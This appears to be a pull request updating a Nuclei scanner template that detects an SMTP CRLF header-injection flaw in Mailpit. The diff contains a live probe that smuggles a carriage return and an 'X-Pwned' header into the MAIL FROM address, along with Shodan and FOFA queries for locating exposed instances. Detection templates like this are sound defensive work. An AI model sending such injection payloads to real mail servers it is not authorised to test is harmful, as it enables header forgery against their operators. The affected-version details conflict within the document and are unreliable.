### PR TITLE
Add CVE-2026-23829 for Mailpit SMTP CRLF Injection

### DIFF
--- a/http/cves/2026/CVE-2026-23829.yaml
+++ b/http/cves/2026/CVE-2026-23829.yaml
@@ -5,7 +5,7 @@ info:
   author: omarkurt
   severity: medium
   description: |
-    Mailpit versions before 1.28.2 are vulnerable to SMTP CRLF Injection due to an insufficient  Regular Expression used to validate RCPT TO and MAIL FROM addresses. An attacker can inject arbitrary SMTP headers by including carriage return characters (\r) in the email address, as the regex intended to filter control characters fails to exclude \r and \n.
+    Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server, letting attackers inject arbitrary SMTP headers, exploit requires crafted email addresses
   impact: |
     An attacker can inject arbitrary headers into captured emails, corrupt existing headers like the Received header, and generate malformed .eml files. This violates RFC 5321 which forbids control characters in envelope addresses.
   remediation: |
@@ -21,25 +21,26 @@ info:
     cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*
   metadata:
     verified: true
-    max-request: 1
     vendor: axllent
     product: mailpit
     shodan-query: title:"Mailpit"
     fofa-query: title="Mailpit"
-  tags: cve,cve2026,crlf,smtp,mailpit,axllent,injection
+  tags: cve,cve2026,tcp,crlf,smtp,mailpit,
 
-network:
+
+tcp:
   - inputs:
-      - data: "EHLO test.local\r\n"
-        read: 1024
-      - data: "MAIL FROM:<attacker@test.local>\r\n"
-        read: 1024
-      - data: "RCPT TO:<victim\rX-Injected: nuclei-test>\r\n"
-        read: 1024
+      - data: "EHLO {{Hostname}}\r\n"
+      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
+      - data: "RCPT TO:<victim@example.com>\r\n"
+      - data: "DATA\r\n"
+      - data: "Subject: Test \r\n\r\nCombined Template Check.\r\n.\r\n"
       - data: "QUIT\r\n"
 
     host:
       - "{{Hostname}}"
+    port: 1025
+    read-size: 2048
 
     matchers-condition: and
     matchers:
@@ -48,8 +49,8 @@ network:
           - "250"
 
       - type: word
-        negative: true
         words:
           - "501"
           - "500"
           - "553"
+        negative: true


### PR DESCRIPTION
Mailpit versions before 1.28.2 are vulnerable to SMTP CRLF Injection due to insufficient regex validation. Upgrade to version 1.28.3 or later to fix this issue.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-23829

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

equisites are obligatory; they are merely intended to speed the review process. -->
